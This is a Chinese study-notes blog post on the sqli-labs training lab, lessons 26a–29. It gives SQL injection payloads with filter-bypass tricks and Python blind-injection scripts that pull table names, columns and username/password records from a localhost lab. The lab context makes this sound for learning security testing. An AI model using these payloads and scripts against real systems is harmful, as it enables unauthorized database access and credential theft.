DAY 5

sqli-labs lesson 26a

  • 闭合符号为单引号和括号,并且不回显错误,如果服务器是Linux,尝试%a0代替空格,这里尝试使用布尔型
  • 数据库名长度:?id=1’)&&if(length(database())=8,1,0)||('0
  • 爆库:?id=1’)&&if(left(database(),8)=‘security’,1,0)||('0
  • 爆表:

    • 当返回为真,长度为914,返回为假,长度为863
    • 编写Python脚本辅助解题:
      #coding:utf-8
      import urllib
      
      print "26a"
      url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
      html = urllib.urlopen(url).read()
      
      pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
      end_url = "||(%270"
      # condition = ""
      # payload = "if((" + condition + "),1,0)"
      
      from_ = "infoorrmation_schema.tables"
      where = "table_schema='security'"
      select = "select(group_concat(table_name))from(" + from_ + ")where(" + where + ")"
      result = []
      for pos in range(1,100):
          # 判断出界
          condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(127)
          payload = "if((" + condition + "),1,0)"
          url = pre_url + payload + end_url
          if "Your Login name" in urllib.urlopen(url).read():
              print "".join(result)
              exit()
          # 没有出界
          asc1 = 32
          asc2 = 127
          while not asc1 >= asc2:
              # 判断出界
              condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
              payload = "if((" + condition + "),1,0)"
              url = pre_url + payload + end_url
              # print url
              if "Your Login name" in urllib.urlopen(url).read():
                  asc1 = (asc1+asc2)//2 + 1
              else:
                  asc2 = (asc1+asc2)//2
          result.append(chr(asc1))
          print "".join(result)
      

  • 爆字段:
#coding:utf-8
import urllib

print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"

from_ = "infoorrmation_schema.columns"
where = "table_schema='security'%26%26table_name='users'"
select = "select(group_concat(column_name))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
    # 判断出界
    condition = "length((" + select + "))<" + str(pos)
    payload = "if((" + condition + "),1,0)"
    url = pre_url + payload + end_url
    if "Your Login name" in urllib.urlopen(url).read():
        print "".join(result)
        print "CRACKED"
        exit()
    # 没有出界
    asc1 = 32
    asc2 = 127
    while not asc1 >= asc2:
        # 判断出界
        condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
        payload = "if((" + condition + "),1,0)"
        url = pre_url + payload + end_url
        # print url
        if "Your Login name" in urllib.urlopen(url).read():
            asc1 = (asc1+asc2)//2 + 1
        else:
            asc2 = (asc1+asc2)//2
    result.append(chr(asc1))
    print "".join(result)
  • 爆记录:
#coding:utf-8
import urllib

print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"

from_ = "users"
where = "1=1"
select = "select(group_concat(concat(username,passwoorrd)))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
    # 判断出界
    condition = "length((" + select + "))<" + str(pos)
    payload = "if((" + condition + "),1,0)"
    url = pre_url + payload + end_url
    if "Your Login name" in urllib.urlopen(url).read():
        print "".join(result)
        print "CRACKED"
        exit()
    # 没有出界
    asc1 = 32
    asc2 = 127
    while not asc1 >= asc2:
        # 判断出界
        condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
        payload = "if((" + condition + "),1,0)"
        url = pre_url + payload + end_url
        # print url
        if "Your Login name" in urllib.urlopen(url).read():
            asc1 = (asc1+asc2)//2 + 1
        else:
            asc2 = (asc1+asc2)//2
    result.append(chr(asc1))
    print "".join(result)

注:最大破解长度可以更改

sqli-labs lesson 27

  • 过滤了select、SELECT和Select等,直接报错注入
  • 爆库:?id=1%27%26%26extractvalue(1,concat(0x7e,(database()),0x7e))||%27
  • 爆表:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema=‘security’)),0x7e))||’
  • 爆字段:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_schema=‘security’%26%26table_name=‘users’)),0x7e))||’
  • 爆记录:http://localhost/sqli-labs-master/Less-27/?id=1'%26%26extractvalue(1,concat(0x7e,mid((seLect(group_concat(concat_ws(',',username,password)))from(security.users)),position,length),0x7e))||%27

sqli-labs 27a

  • 依然是盲注
  • 注入点与闭合符号的检测:?id=1"%26%260||"0
  • 爆库:
#coding:utf-8
import urllib

print "27a"
# url = "http://localhost/sqli-labs-master/Less-27/?id=1%22a)%26%26if(1,1,0)||(%220"
# html = urllib.urlopen(url).read()

pre_url = "http://localhost/sqli-labs-master/Less-27a/?id=1%22%26%26"
end_url = "||%220"
# condition = ""
# payload = "if((" + condition + "),1,0)"

from_ = "users"
where = "1=1"
# select = "seLect(group_concat(concat(username,password)))from(" + from_ + ")where(" + where + ")"
select = "database()"
result = []
for pos in range(1,100):
    # 判断出界
    condition = "length((" + select + "))<" + str(pos)
    payload = "if((" + condition + "),1,0)"
    url = pre_url + payload + end_url
    if "Your Login name" in urllib.urlopen(url).read():
        print "".join(result)
        print "CRACKED"
        exit()
    # 没有出界
    asc1 = 32
    asc2 = 127
    while not asc1 >= asc2:
        # 判断出界
        condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
        payload = "if((" + condition + "),1,0)"
        url = pre_url + payload + end_url
        # print url
        if "Your Login name" in urllib.urlopen(url).read():
            asc1 = (asc1+asc2)//2 + 1
        else:
            asc2 = (asc1+asc2)//2
    result.append(chr(asc1))
    print "".join(result)

  • 爆表,爆字段,爆记录:代码同lesson 26a,更改url即可

sqli-labs lesson 28

  • 闭合符号为’),盲注与上一题同解
  • 报错注入同lesson 27

sqli-labs lesson 28a

  • 与lesson 28的盲注同解

sqli-labs lesson 29

sqli-labs学习笔记 DAY5的更多相关文章

  1. Sqli - Labs 靶场笔记(一)

    Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...

  2. Python学习笔记——Day5(转载)

    python 编码转换 主要介绍了python的编码机制,unicode, utf-8, utf-16, GBK, GB2312,ISO-8859-1 等编码之间的转换. 常见的编码转换分为以下几种情 ...

  3. Python学习笔记-Day5

    冒泡算法: 实现1: a = [,,,,,,,,,,,,,,] def bubble(badlist): sort = False while not sort: sort = True ): ]: ...

  4. Python学习笔记day5

    模块 1.自定义模块 自定义模块就是在当前目录下创建__init__.py这个空文件,这样外面的程序才能识别此目录为模块包并导入 上图中libs目录下有__init__.py文件,index.py程序 ...

  5. 学习笔记day5:inline inline-block block区别

    1. block元素可以包含block元素和inline元素:但inline元素只能包含inline元素.要注意的是这个是个大概的说法,每个特定的元素能包含的元素也是特定的,所以具体到个别元素上,这条 ...

  6. JS学习笔记Day5

    一.变量的作用域 1.作用域:变量的作用范围 2.全局变量:变量在整个程序都是有效的(从程序开始到程序结束变量均有效)在函数体外部定义的变量都是全局变量:在函数体内部 没有用var定义的变量也有可能是 ...

  7. HTML学习笔记Day5

    一.CSS属性 1.文本溢出是否“...”显示属性:text-overflow:clip(不显示省略标记)/ellipsis(文本溢出时“...”显示) 定义此属性有四个必要条件:1)须有容器宽度:w ...

  8. Python学习笔记 - day5 - 文件操作

    Python文件操作 读写文件是最常见的IO操作,在磁盘上读写文件的功能都是由操作系统提供的,操作系统不允许普通的程序直接操作磁盘(大部分程序都需要间接的通过操作系统来完成对硬件的操作),所以,读写文 ...

  9. 商业爬虫学习笔记day5

    一. 发送post请求 import requests url = "" # 发送post请求 data = { } response = requests.post(url, d ...

随机推荐

  1. find 的一些用法

    find的一些用法 例1:find . -type f -exec chmod -R 644 {} \ ;   #{}代表签名的输出,\;代表结束命令操作结束 例2: find -print0 |xa ...

  2. C语言程序设计I—第三周教学

    由于本课程是从教学周的第二周开始上课,所以第二次授课是发生在第三周,为了让PTA.云班课和博客能统一,所以将教学周作为随笔的标题.本周由于处理外聘教师随意退课等事情,总结有些延后了. 第三周教学安排 ...

  3. 工程脚本插件方案 - c集成Python基础篇

    序: 为什么要集成脚本,怎么在工程中集成Python脚本. 在做比较大型的工程时,一般都会分核心层和业务层.核心层要求实现高效和稳定的基础功能,并提供调用接口供业务层调用的一种标准的框架划分.在实际中 ...

  4. EatWhat 实用的APP

    EatWhat最近比较闲开始学习煮粥,买了好多米和豆子,每天煮的都不一样,试了几天发现有的时候记不住要煮什么粥,所以就写了这个APP.每天煮粥的时候拿出来看看就可以了,再也不用思考半天要煮什么粥了. ...

  5. PHP中查询一个日期是周几

    PHP查询一个日期是周几 1.date('l'),获取的是英文的星期几.Sunday 到 Saturday date('l', strtotime('2019-4-6')); // Saturday ...

  6. ETL项目2:大数据清洗,处理:使用MapReduce进行离线数据分析并报表显示完整项目

    ETL项目2:大数据清洗,处理:使用MapReduce进行离线数据分析并报表显示完整项目 思路同我之前的博客的思路 https://www.cnblogs.com/symkmk123/p/101974 ...

  7. Qt样式总结

    说明 将Qt样式进行一下总结, 以后逐步更新 QPushbutton QPushbutton setStyleSheet("QPushButton{ border:1px solid #40 ...

  8. u-boot-1.1.6第2阶段入口函数start_armboot分析

    学习目标: 1.分析u-boot-1.1.6第2阶段入口函数void start_armboot (void),熟悉该函数所实现的功能 2.为后面能够掌握u-boot-1.1.6如何启动内核过程打下基 ...

  9. Python数值运算与赋值的快捷方式

    一种比较常见的操作是对一个变量进行一项数学运算并将运算得出的结果返回给这个变量,因此对于这类运算通常有如下的快捷表达方式: a = 2a = a * 3 同样也可写作: a = 2a *= 3 要注意 ...

  10. JavaWeb基础—HTML小结

    ---是什么?超文本标记语言---能干什么?描述网页的一种语言---怎么干?一套标签 前端三剑客的关系: 1. HTML是网页内容的载体. 2. CSS样式是表现. 3. JavaScript是用来实 ...